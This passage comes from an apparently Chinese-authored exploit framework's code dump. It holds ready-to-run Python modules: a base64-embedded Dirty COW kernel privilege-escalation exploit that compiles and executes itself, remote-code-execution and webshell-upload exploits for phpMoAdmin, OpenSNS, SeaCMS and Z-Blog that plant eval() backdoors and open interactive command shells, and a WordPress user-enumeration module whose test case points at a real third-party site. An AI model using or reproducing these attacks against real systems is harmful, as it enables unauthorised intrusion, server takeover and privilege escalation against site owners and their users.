dCBwcml2aWxlZ2UgZXNjYWxhdGlvblxuIik7CiAgICBwcmludGYoIkJhY2tpbmcgdXAgJXMgdG8g 81 | L3RtcC9iYWtcbiIsIHN1aWRfYmluYXJ5KTsKCiAgICBhc3ByaW50ZigmYmFja3VwLCAiY3AgJXMg 82 | L3RtcC9iYWsiLCBzdWlkX2JpbmFyeSk7CiAgICBzeXN0ZW0oYmFja3VwKTsKCiAgICBmID0gb3Bl 83 | bihzdWlkX2JpbmFyeSxPX1JET05MWSk7CiAgICBmc3RhdChmLCZzdCk7CgogICAgcHJpbnRmKCJT 84 | aXplIG9mIGJpbmFyeTogJWRcbiIsIHN0LnN0X3NpemUpOwoKICAgIGNoYXIgcGF5bG9hZFtzdC5z 85 | dF9zaXplXTsKICAgIG1lbXNldChwYXlsb2FkLCAweDkwLCBzdC5zdF9zaXplKTsKICAgIG1lbWNw 86 | eShwYXlsb2FkLCBzYywgc2NfbGVuKzEpOwoKICAgIG1hcCA9IG1tYXAoTlVMTCxzdC5zdF9zaXpl 87 | LFBST1RfUkVBRCxNQVBfUFJJVkFURSxmLDApOwoKICAgIHByaW50ZigiUmFjaW5nLCB0aGlzIG1h 88 | eSB0YWtlIGEgd2hpbGUuLlxuIik7CgogICAgcHRocmVhZF9jcmVhdGUoJnB0aDEsIE5VTEwsICZt 89 | YWR2aXNlVGhyZWFkLCBzdWlkX2JpbmFyeSk7CiAgICBwdGhyZWFkX2NyZWF0ZSgmcHRoMiwgTlVM 90 | TCwgJnByb2NzZWxmbWVtVGhyZWFkLCBwYXlsb2FkKTsKICAgIHB0aHJlYWRfY3JlYXRlKCZwdGgz 91 | LCBOVUxMLCAmd2FpdEZvcldyaXRlLCBOVUxMKTsKCiAgICBwdGhyZWFkX2pvaW4ocHRoMywgTlVM 92 | TCk7CgogICAgcmV0dXJuIDA7Cn0K 93 | ''' 94 | 95 | def __init__(self): 96 | pass 97 | 98 | def exploit(self): 99 | ''' 100 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 101 | ''' 102 | Log.Log.info("Creating source code...") 103 | with open("/tmp/dirtyc0w.c", "w") as f: 104 | f.write(self.code.decode("base64")) 105 | Log.Log.info("Compiling...") 106 | os.system("gcc -o /tmp/dirtyc0w /tmp/dirtyc0w.c -pthread") 107 | Log.Log.info("Executing...") 108 | os.system("/tmp/dirtyc0w") 109 | Log.Log.info("Cleaning...") 110 | os.system("rm -rf /tmp/dirtyc0w") 111 | os.system("rm -rf /tmp/dirtyc0w.c") 112 | Log.Log.success("Exploit success!") 113 | 114 | def show_options(self): 115 | ''' 116 | 输出该模块的选项信息 (即之前定义的 config) 117 | 由 options 命令触发 118 | 通常不需要改动 119 | ''' 120 | if len(self.config.keys()) == 0: 121 | return 122 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 123 | Log.Log.warning("-------\t\t---------\t\t-------") 124 | for key in sorted(self.config.keys()): 125 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 126 | key, 
self.config[key]["necessity"], self.get_config(key))) 127 | 128 | def set_config(self, key, value): 129 | ''' 130 | 对模块的参数进行修改 131 | 由 set 命令触发 132 | 通常不需要改动 133 | ''' 134 | if key in self.config.keys(): 135 | self.config[key]["default"] = value 136 | else: 137 | Log.Log.error("No such option!") 138 | 139 | def get_config(self, key): 140 | return self.config[key]["default"] 141 | 142 | def show_info(self): 143 | ''' 144 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 145 | 该函数在模块被加载的时候自动调用 146 | 需要将其中的信息修改为对应的模块信息 147 | ''' 148 | Log.Log.info("Name: Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)") 149 | Log.Log.info("Effected Version: 2.6.22 < 3.9 (x86/x64)") 150 | Log.Log.info("Author: Robin Verton") 151 | Log.Log.info("Refer:") 152 | Log.Log.info("\thttps://www.exploit-db.com/exploits/40616/") 153 | 154 | def main(): 155 | ''' 156 | 测试用例 157 | ''' 158 | exploit = Exploit() 159 | exploit.show_info() 160 | exploit.show_options() 161 | exploit.exploit() 162 | 163 | if __name__ == "__main__": 164 | main() 165 | -------------------------------------------------------------------------------- /exploit/moadmin/cve_2015_2208.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "path": {"default": "/administrator", "necessity": True}, 25 | "command": {"default": "id", "necessity": True}, 26 | } 27 | session = requests.Session() 28 | 29 | def 
__init__(self): 30 | pass 31 | 32 | def exploit(self): 33 | ''' 34 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 35 | ''' 36 | Log.Log.info("Lauching the exploition...") 37 | host = self.get_config("remote_host") 38 | port = int(self.get_config("remote_port")) 39 | path = self.get_config("path") 40 | command = self.get_config("command") 41 | url = "http://%s:%d/%s/moadmin.php?collection=1" % (host, port, path) 42 | data = { 43 | "object": "1;system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 44 | } 45 | Log.Log.info("Url: %s" % (url)) 46 | Log.Log.info("Data: %s" % (data)) 47 | try: 48 | response = requests.post(url, data=data) 49 | if response.status_code == 200: 50 | Log.Log.success("Exploit success!") 51 | print("%s" % (color.blue(response.content))) 52 | return True 53 | else: 54 | return False 55 | except Exception as e: 56 | Log.Log.error(str(e)) 57 | return False 58 | 59 | def show_options(self): 60 | ''' 61 | 输出该模块的选项信息 (即之前定义的 config) 62 | 由 options 命令触发 63 | 通常不需要改动 64 | ''' 65 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 66 | Log.Log.warning("-------\t\t---------\t\t-------") 67 | for key in sorted(self.config.keys()): 68 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 69 | key, self.config[key]["necessity"], self.get_config(key))) 70 | 71 | def set_config(self, key, value): 72 | ''' 73 | 对模块的参数进行修改 74 | 由 set 命令触发 75 | 通常不需要改动 76 | ''' 77 | if key in self.config.keys(): 78 | self.config[key]["default"] = value 79 | else: 80 | Log.Log.error("No such option!") 81 | 82 | def get_config(self, key): 83 | return self.config[key]["default"] 84 | 85 | def interactive(self): 86 | ''' 87 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 88 | 这里判断了 webshell_url 这个变量是否为空 89 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 90 | ''' 91 | if self.webshell_url == "": 92 | Log.Log.error("Webshell is dead!") 93 | return 94 | while True: 95 | command = input("$ ") 96 | if command == "exit": 97 | break 98 | data = { 99 | 
self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 100 | } 101 | print(data) 102 | try: 103 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 104 | except Exception as e: 105 | Log.Log.error(str(e)) 106 | return False 107 | 108 | def show_info(self): 109 | ''' 110 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 111 | 该函数在模块被加载的时候自动调用 112 | 需要将其中的信息修改为对应的模块信息 113 | ''' 114 | Log.Log.info("Name: phpMoAdmin (1.1.2) RCE (CVE-2015-2208)") 115 | Log.Log.info("Effected Version: <=1.1.2") 116 | Log.Log.info("Author: ") 117 | Log.Log.info("\tPichaya Morimoto pichaya") 118 | Log.Log.info("\tRicardo Jorge Borges de Almeida ") 119 | Log.Log.info("Refer:") 120 | Log.Log.info("\thttp://seclists.org/fulldisclosure/2015/Mar/19") 121 | Log.Log.info("\thttp://seclists.org/oss-sec/2015/q1/743") 122 | Log.Log.info("\thttps://www.exploit-db.com/exploits/36251/") 123 | Log.Log.info("\thttps://nvd.nist.gov/vuln/detail/CVE-2015-2208") 124 | 125 | def main(): 126 | ''' 127 | 测试用例 128 | ''' 129 | exploit = Exploit() 130 | exploit.show_info() 131 | exploit.set_config("remote_host", "192.168.187.1") 132 | exploit.show_options() 133 | exploit.exploit() 134 | 135 | if __name__ == "__main__": 136 | main() 137 | -------------------------------------------------------------------------------- /exploit/opensns/front_page_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | 14 | class Exploit: 15 | config = { 16 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 17 | "remote_port": {"default": 80, "necessity":True}, 18 | "shell_pwd": {"default": "c", "necessity":True}, 19 | "webshell": {"default": "", "necessity":True}, 20 | 
"interactive": {"default": True, "necessity":True} 21 | } 22 | webshell_url = "" 23 | 24 | def __init__(self): 25 | pass 26 | 27 | def exploit(self): 28 | remote_host = self.get_config("remote_host") 29 | remote_port = int(self.get_config("remote_port")) 30 | password = self.get_config("shell_pwd") 31 | webshell = self.get_config("webshell").replace("__PASSWORD__", password); 32 | url = "http://%s:%d/index.php?s=/Core/File/uploadPictureBase64.html" % (remote_host, remote_port) 33 | data = { 34 | 'data': 'data:image/php;base64,%s' % (webshell.encode("base64").replace("\n", "")) 35 | } 36 | Log.Log.info("Data: %s" % (data)) 37 | response = requests.post(url, data=data) 38 | content = response.content 39 | 40 | if content.startswith("{\"status\":") and content.endswith(".php\"}"): 41 | Log.Log.success("Exploit successfully!") 42 | Log.Log.success(success_json) 43 | success_json = json.loads(content) 44 | self.webshell_url = success_json['path'].replace("\\/", "/") 45 | if self.get_config(interactive) == True: 46 | self.interactive() 47 | return True 48 | Log.Log.error("Exploit failed!") 49 | return False 50 | 51 | def show_options(self): 52 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 53 | Log.Log.warning("-------\t\t---------\t\t-------") 54 | for key in sorted(self.config.keys()): 55 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 56 | 57 | def set_config(self, key, value): 58 | if key in self.config.keys(): 59 | self.config[key]["default"] = value 60 | else: 61 | Log.Log.error("No such option!") 62 | 63 | def get_config(self, key): 64 | return self.config[key]["default"] 65 | 66 | def show_info(self): 67 | Log.Log.info("Name: OpenSNS(3.3.1) UnAuthenticated GetShell") 68 | Log.Log.info("Effected Version: <=3.3.1") 69 | Log.Log.info("Author: Unknown") 70 | Log.Log.info("Email: Unknown") 71 | Log.Log.info("Refer:") 72 | Log.Log.info("\thttps://forum.90sec.org/forum.php?mod=viewthread&tid=10250") 73 | 74 | def 
interactive(self): 75 | if self.webshell_url == "": 76 | Log.Log.error("Webshell is dead!") 77 | return 78 | while True: 79 | command = input("$ ") 80 | if command == "exit": 81 | break 82 | data = { 83 | self.get_config("shell_pwd"):"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")) 84 | } 85 | print(data) 86 | try: 87 | Log.Log.success(requests.post(self.webshell_url, data=data).content) 88 | except Exception as e: 89 | Log.Log.error(str(e)) 90 | return False 91 | 92 | 93 | def main(): 94 | exploit = Exploit() 95 | exploit.show_info() 96 | exploit.set_config("remote_host", "192.168.187.1") 97 | exploit.show_options() 98 | exploit.exploit() 99 | 100 | if __name__ == "__main__": 101 | main() 102 | -------------------------------------------------------------------------------- /exploit/seacms/cve_2017_17561.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | except Exception as e: 9 | import sys 10 | sys.path.append("../../core/log") 11 | from Log import Log 12 | 13 | class Exploit: 14 | config = { 15 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 16 | "remote_port": {"default": 80, "necessity":True}, 17 | "admin_path": {"default": "admin", "necessity":True}, 18 | # "session_auth": {"default": True, "necessity":True}, 19 | "session_id": {"default": "", "necessity":True}, 20 | # "admin_user": {"default": "admin", "necessity":True}, 21 | # "admin_pwd": {"default": "admin", "necessity":True}, 22 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity":True}, 23 | "shell_pwd":{"default": "c", "necessity":True}, 24 | "interactive":{"default":True, "necessity":True} 25 | } 26 | webshell_url = "" 27 | 28 | def __init__(self): 29 | pass 30 | 31 | def exploit(self): 32 | host = self.get_config("remote_host") 33 | port = int(self.get_config("remote_port")) 34 | 
admin_path = self.get_config("admin_path") 35 | # session_auth = self.get_config("session_auth") 36 | session_id = self.get_config("session_id") 37 | # username = self.get_config("username") 38 | # password = self.get_config("password") 39 | webshell_password = self.get_config("shell_pwd") 40 | webshell = self.get_config("webshell").replace("__PASSWORD__", webshell_password) 41 | url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, admin_path) 42 | data = { 43 | "weburl":"www.seacms.net", 44 | "token":"123456789\";$var=%s.\"" % (webshell) 45 | } 46 | cookies = { 47 | "PHPSESSID":session_id 48 | } 49 | Log.Log.info("Data: %s" % (data)) 50 | Log.Log.info("Session: %s" % (cookies)) 51 | try: 52 | response = requests.post(url, data=data, cookies=cookies) 53 | self.webshell_url = "http://%s:%d/data/%s/ping.php" % (host, port, admin_path) 54 | if response.status_code == 200: 55 | Log.Log.success("Exploit success!") 56 | Log.Log.success("Webshell is stored at: %s" % (self.webshell_url)) 57 | Log.Log.success("Password is %s" % (webshell_password)) 58 | if self.get_config("interactive") == True: 59 | self.interactive() 60 | return True 61 | else: 62 | return False 63 | except Exception as e: 64 | Log.Log.error(str(e)) 65 | return False 66 | 67 | def show_options(self): 68 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 69 | Log.Log.warning("-------\t\t---------\t\t-------") 70 | for key in sorted(self.config.keys()): 71 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 72 | 73 | def set_config(self, key, value): 74 | if key in self.config.keys(): 75 | self.config[key]["default"] = value 76 | else: 77 | Log.Log.error("No such option!") 78 | 79 | def get_config(self, key): 80 | return self.config[key]["default"] 81 | 82 | def interactive(self): 83 | if self.webshell_url == "": 84 | Log.Log.error("Webshell is dead!") 85 | return 86 | while True: 87 | command = input("$ ") 88 | if command == "exit": 89 | break 90 
| data = { 91 | self.get_config("shell_pwd"):"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")) 92 | } 93 | print(data) 94 | try: 95 | Log.Log.success(requests.post(self.webshell_url, data=data).content) 96 | except Exception as e: 97 | Log.Log.error(str(e)) 98 | return False 99 | 100 | def show_info(self): 101 | Log.Log.info("Name: SeaCMS(6.56) Authenticated GetShell (CVE-2017-17561)") 102 | Log.Log.info("Effected Version: <=6.56") 103 | Log.Log.info("Author: WangYihang") 104 | Log.Log.info("Email: wangyihanger@gmail.com") 105 | Log.Log.info("Refer:") 106 | Log.Log.info("\thttps://gist.github.com/WangYihang/9507e2efdceb67a5bc2761200f19f213") 107 | Log.Log.info("\thttps://nvd.nist.gov/vuln/detail/CVE-2017-17561") 108 | 109 | def main(): 110 | exploit = Exploit() 111 | exploit.show_info() 112 | exploit.set_config("remote_host", "192.168.187.1") 113 | exploit.set_config("session_id", "b6aia8tltrqtie7h0pjojelml3") 114 | exploit.set_config("shell_pwd", "hacker") 115 | exploit.show_options() 116 | exploit.exploit() 117 | 118 | if __name__ == "__main__": 119 | main() 120 | -------------------------------------------------------------------------------- /exploit/seacms/seacms_v628_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity": True}, 25 | "webroot": {"default": "/var/www/html", "necessity": True}, 26 | 
"shell_path": {"default": "__WEBROOT__/version.php", "necessity": True}, 27 | "shell_pwd": {"default": "c", "necessity": True}, 28 | "interactive": {"default": True, "necessity": True} 29 | } 30 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 31 | webshell_url = "" 32 | session = requests.Session() 33 | 34 | def __init__(self): 35 | pass 36 | 37 | def exploit(self): 38 | ''' 39 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 40 | ''' 41 | Log.Log.info("Lauching the exploition...") 42 | host = self.get_config("remote_host") 43 | port = int(self.get_config("remote_port")) 44 | abs_path = self.get_config("shell_path")[len("__WEBROOT__"):] 45 | webshell_path = self.get_config("shell_path").replace("__WEBROOT__", self.get_config("webroot")) 46 | webshell_password = self.get_config("shell_pwd") 47 | webshell = self.get_config("webshell").replace( 48 | "__PASSWORD__", webshell_password) 49 | url = "http://%s:%d/search.php?searchtype=5&tid=&area=eval($_POST[data])" % (host, port) 50 | data = { 51 | "data": "file_put_contents('%s', base64_decode('%s'));die();" % (webshell_path, webshell.encode("base64").replace("\n", "")) 52 | } 53 | Log.Log.info("Data: %s" % (data)) 54 | try: 55 | response = requests.post(url, data=data) 56 | self.webshell_url = "http://%s:%d/%s" % (host, port, abs_path) 57 | if response.status_code == 200: 58 | Log.Log.success("Exploit success!") 59 | Log.Log.success("Webshell is stored at: %s" % (self.webshell_url)) 60 | Log.Log.success("Password is %s" % (webshell_password)) 61 | if self.get_config("interactive") == True: 62 | self.interactive() 63 | return True 64 | else: 65 | Log.Log.error("Exploit failed!") 66 | print("%s" % (color.red(response.content))) 67 | return False 68 | except Exception as e: 69 | Log.Log.error(str(e)) 70 | return False 71 | 72 | def show_options(self): 73 | ''' 74 | 输出该模块的选项信息 (即之前定义的 config) 75 | 由 options 命令触发 76 | 通常不需要改动 77 | ''' 78 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 79 | Log.Log.warning("-------\t\t---------\t\t-------") 80 | for 
key in sorted(self.config.keys()): 81 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 82 | key, self.config[key]["necessity"], self.get_config(key))) 83 | 84 | def set_config(self, key, value): 85 | ''' 86 | 对模块的参数进行修改 87 | 由 set 命令触发 88 | 通常不需要改动 89 | ''' 90 | if key in self.config.keys(): 91 | self.config[key]["default"] = value 92 | Log.Log.success("%s\t==>\t%s" % (key, value)) 93 | else: 94 | Log.Log.error("No such option: %s" % (key)) 95 | 96 | def get_config(self, key): 97 | return self.config[key]["default"] 98 | 99 | def interactive(self): 100 | ''' 101 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 102 | 这里判断了 webshell_url 这个变量是否为空 103 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 104 | ''' 105 | if self.webshell_url == "": 106 | Log.Log.error("Webshell is dead!") 107 | return 108 | while True: 109 | command = input("$ ") 110 | if command == "exit": 111 | break 112 | data = { 113 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 114 | } 115 | print(data) 116 | try: 117 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 118 | except Exception as e: 119 | Log.Log.error(str(e)) 120 | return False 121 | 122 | def show_info(self): 123 | ''' 124 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 125 | 该函数在模块被加载的时候自动调用 126 | 需要将其中的信息修改为对应的模块信息 127 | ''' 128 | Log.Log.info("Name: SeaCMS(6.28) UnAuthenticated RCE") 129 | Log.Log.info("Effected Version: <=6.28") 130 | Log.Log.info("Author: 没穿底裤") 131 | Log.Log.info("Home: http://0day5.com/author/1/") 132 | Log.Log.info("Refer:") 133 | Log.Log.info("\thttp://0day5.com/archives/4180/") 134 | 135 | def main(): 136 | ''' 137 | 测试用例 138 | ''' 139 | exploit = Exploit() 140 | exploit.show_info() 141 | exploit.set_config("remote_host", "localhost") 142 | exploit.set_config("shell_pwd", "hacker") 143 | exploit.show_options() 144 | exploit.exploit() 145 | 146 | if __name__ == "__main__": 147 | main() 148 | 
-------------------------------------------------------------------------------- /exploit/wordpress/cve_2017_5487.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | from core.log import color 10 | except Exception as e: 11 | import sys 12 | sys.path.append("../../core/log") 13 | from Log import Log 14 | from Log import color 15 | 16 | 17 | class Exploit: 18 | # 定义该漏洞利用的配置信息 19 | # 备注: 20 | # necessity 表示该参数是否必须配置 21 | # default 为该参数的默认值 22 | config = { 23 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 24 | "remote_port": {"default": 80, "necessity": True}, 25 | } 26 | session = requests.Session() 27 | 28 | def __init__(self): 29 | pass 30 | 31 | def exploit(self): 32 | ''' 33 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 34 | ''' 35 | Log.Log.info("Lauching the exploition...") 36 | host = self.get_config("remote_host") 37 | port = int(self.get_config("remote_port")) 38 | url = "http://%s:%d/wp-json/wp/v2/users/" % (host, port) 39 | try: 40 | response = requests.get(url) 41 | if response.status_code == 200: 42 | Log.Log.success("Exploit success!") 43 | content = response.content 44 | print("%s" % (color.cyan("ID\tUser\t\tDescription"))) 45 | for user in json.loads(content)[::-1]: 46 | username = user["name"] 47 | if len(username) > 8: 48 | print("%s\t%s\t%s" % (user["id"], user["name"], user["description"])) 49 | else: 50 | print("%s\t%s\t\t%s" % (user["id"], user["name"], user["description"])) 51 | return True 52 | else: 53 | Log.Log.error("Exploit Failed!") 54 | return False 55 | except Exception as e: 56 | Log.Log.error(str(e)) 57 | return False 58 | 59 | def show_options(self): 60 | ''' 61 | 输出该模块的选项信息 (即之前定义的 config) 62 | 由 options 命令触发 63 | 通常不需要改动 64 | ''' 65 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 66 | Log.Log.warning("-------\t\t---------\t\t-------") 67 | for key in 
sorted(self.config.keys()): 68 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 69 | key, self.config[key]["necessity"], self.get_config(key))) 70 | 71 | def set_config(self, key, value): 72 | ''' 73 | 对模块的参数进行修改 74 | 由 set 命令触发 75 | 通常不需要改动 76 | ''' 77 | if key in self.config.keys(): 78 | self.config[key]["default"] = value 79 | else: 80 | Log.Log.error("No such option!") 81 | 82 | def get_config(self, key): 83 | return self.config[key]["default"] 84 | 85 | def interactive(self): 86 | ''' 87 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 88 | 这里判断了 webshell_url 这个变量是否为空 89 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 90 | ''' 91 | if self.webshell_url == "": 92 | Log.Log.error("Webshell is dead!") 93 | return 94 | while True: 95 | command = input("$ ") 96 | if command == "exit": 97 | break 98 | data = { 99 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 100 | } 101 | print(data) 102 | try: 103 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 104 | except Exception as e: 105 | Log.Log.error(str(e)) 106 | return False 107 | 108 | def show_info(self): 109 | ''' 110 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 111 | 该函数在模块被加载的时候自动调用 112 | 需要将其中的信息修改为对应的模块信息 113 | ''' 114 | Log.Log.info("Name: WordPress (<4.7.1) Username Enumeration (CVE-2017-5487)") 115 | Log.Log.info("Effected Version: <4.7.1") 116 | Log.Log.info("Author: Mateus a.k.a Dctor") 117 | Log.Log.info("FaceBook: https://fb.com/hatbashbr/") 118 | Log.Log.info("Email: dctoralves@protonmail.ch") 119 | Log.Log.info("Home: https://mateuslino.tk ") 120 | Log.Log.info("Refer:") 121 | Log.Log.info("\thttps://www.exploit-db.com/exploits/41497/") 122 | 123 | def main(): 124 | ''' 125 | 测试用例 126 | ''' 127 | exploit = Exploit() 128 | exploit.show_info() 129 | exploit.set_config("remote_host", "www.wopus.org") 130 | exploit.show_options() 131 | exploit.exploit() 132 | 133 | if __name__ == "__main__": 134 | main() 135 | 
-------------------------------------------------------------------------------- /exploit/zblog/zblog_authenticated_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import hashlib 6 | import sys 7 | import string 8 | 9 | try: 10 | from core.log import Log 11 | except Exception as e: 12 | import sys 13 | sys.path.append("../../core/log") 14 | from Log import Log 15 | 16 | def check_prefix(prefix): 17 | allow_chars = string.letters + string.digits 18 | if len(prefix) < 3: 19 | print("[-] The length of 'prefix' must > 3") 20 | return False 21 | for i in prefix: 22 | if i not in allow_chars: 23 | print("[-] The prefix must be [a-zA-Z0-9]") 24 | return False 25 | return True 26 | 27 | def md5(content): 28 | return hashlib.md5(content).hexdigest() 29 | 30 | class Exploit: 31 | # 定义该漏洞利用的配置信息 32 | # 备注: 33 | # necessity 表示该参数是否必须配置 34 | # default 为该参数的默认值 35 | config = { 36 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 37 | "remote_port": {"default": 80, "necessity": True}, 38 | # "session_auth": {"default": True, "necessity":True}, 39 | # "session_id": {"default": "", "necessity": True}, 40 | "admin_user": {"default": "admin", "necessity":True}, 41 | "admin_pwd": {"default": "admin_zblog", "necessity":True}, 42 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity": True}, 43 | "shell_pwd": {"default": "c", "necessity": True}, 44 | "interactive": {"default": True, "necessity": True}, 45 | "plug_prefix": {"default": "image", "necessity": True}, 46 | "shell_file": {"default": "update.php", "necessity": True} 47 | } 48 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 49 | webshell_url = "" 50 | session = requests.Session() 51 | 52 | def __init__(self): 53 | pass 54 | 55 | def login(self): 56 | remote_host = self.get_config("remote_host") 57 | remote_port = int(self.get_config("remote_port")) 58 | username = 
self.get_config("admin_user") 59 | password = self.get_config("admin_pwd") 60 | url = "http://%s:%d/zb_system/cmd.php?act=verify" % (remote_host, remote_port) 61 | data = { 62 | "username": username, 63 | "password": md5(password), 64 | } 65 | response = self.session.post(url, data=data) 66 | content = response.content 67 | return "后台首页" in content 68 | 69 | def exploit(self): 70 | ''' 71 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 72 | ''' 73 | Log.Log.info("Lauching the exploition...") 74 | remote_host = self.get_config("remote_host") 75 | remote_port = self.get_config("remote_port") 76 | username = self.get_config("admin_user") 77 | password = self.get_config("admin_pwd") 78 | webshell_password = self.get_config("shell_pwd") 79 | prefix = self.get_config("plug_prefix") 80 | filename = self.get_config("shell_file") 81 | webshell = self.get_config("webshell") 82 | 83 | if not check_prefix(prefix): 84 | return False 85 | 86 | if not self.login(): 87 | Log.Log.error("Login failed!") 88 | Log.Log.error("Please check your username and password") 89 | return False 90 | Log.Log.success("[+] Login success!") 91 | 92 | Log.Log.info("[+] Sending payload...") 93 | try: 94 | url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (remote_host, remote_port) 95 | data = { 96 | "app_id": "%s'.%s.'" % (prefix, webshell.replace("__PASSWORD__", webshell_password)), 97 | "app_path": filename, 98 | } 99 | response = self.session.post(url, data=data) 100 | content = response.content 101 | except Exception as e: 102 | Log.Log.error(str(e)) 103 | return False 104 | 105 | if "已存在同名的APP应用" in content: 106 | Log.Log.error("PlugIn name has been used! 
Please change the prefix!") 107 | Log.Log.error("Exploit failed!") 108 | return False 109 | elif len(content) == 0: 110 | self.webshell_url = "http://%s:%d/zb_users/plugin/%s'.%s.'/%s" % (remote_host, remote_port, prefix, webshell.replace("__PASSWORD__", webshell_password), filename) 111 | Log.Log.success("Exploit success!") 112 | Log.Log.success("Enjoy your shell :") 113 | Log.Log.success("Url : %s" % (self.webshell_url)) 114 | Log.Log.success("Pas : c") 115 | Log.Log.success("Remember to die() it!") 116 | self.interactive() 117 | return True 118 | else: 119 | Log.Log.error("Unknown error!") 120 | Log.Log.error("Exploit failed!") 121 | return False 122 | 123 | def show_options(self): 124 | ''' 125 | 输出该模块的选项信息 (即之前定义的 config) 126 | 由 options 命令触发 127 | 通常不需要改动 128 | ''' 129 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 130 | Log.Log.warning("-------\t\t---------\t\t-------") 131 | for key in sorted(self.config.keys()): 132 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 133 | key, self.config[key]["necessity"], self.get_config(key))) 134 | 135 | def set_config(self, key, value): 136 | ''' 137 | 对模块的参数进行修改 138 | 由 set 命令触发 139 | 通常不需要改动 140 | ''' 141 | if key in self.config.keys(): 142 | self.config[key]["default"] = value 143 | else: 144 | Log.Log.error("No such option!") 145 | 146 | def get_config(self, key): 147 | return self.config[key]["default"] 148 | 149 | def interactive(self): 150 | ''' 151 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 152 | 这里判断了 webshell_url 这个变量是否为空 153 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 154 | ''' 155 | if self.webshell_url == "": 156 | Log.Log.error("Webshell is dead!") 157 | return 158 | while True: 159 | command = input("$ ") 160 | if command == "exit": 161 | break 162 | data = { 163 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 164 | } 165 | print(data) 166 | try: 167 | 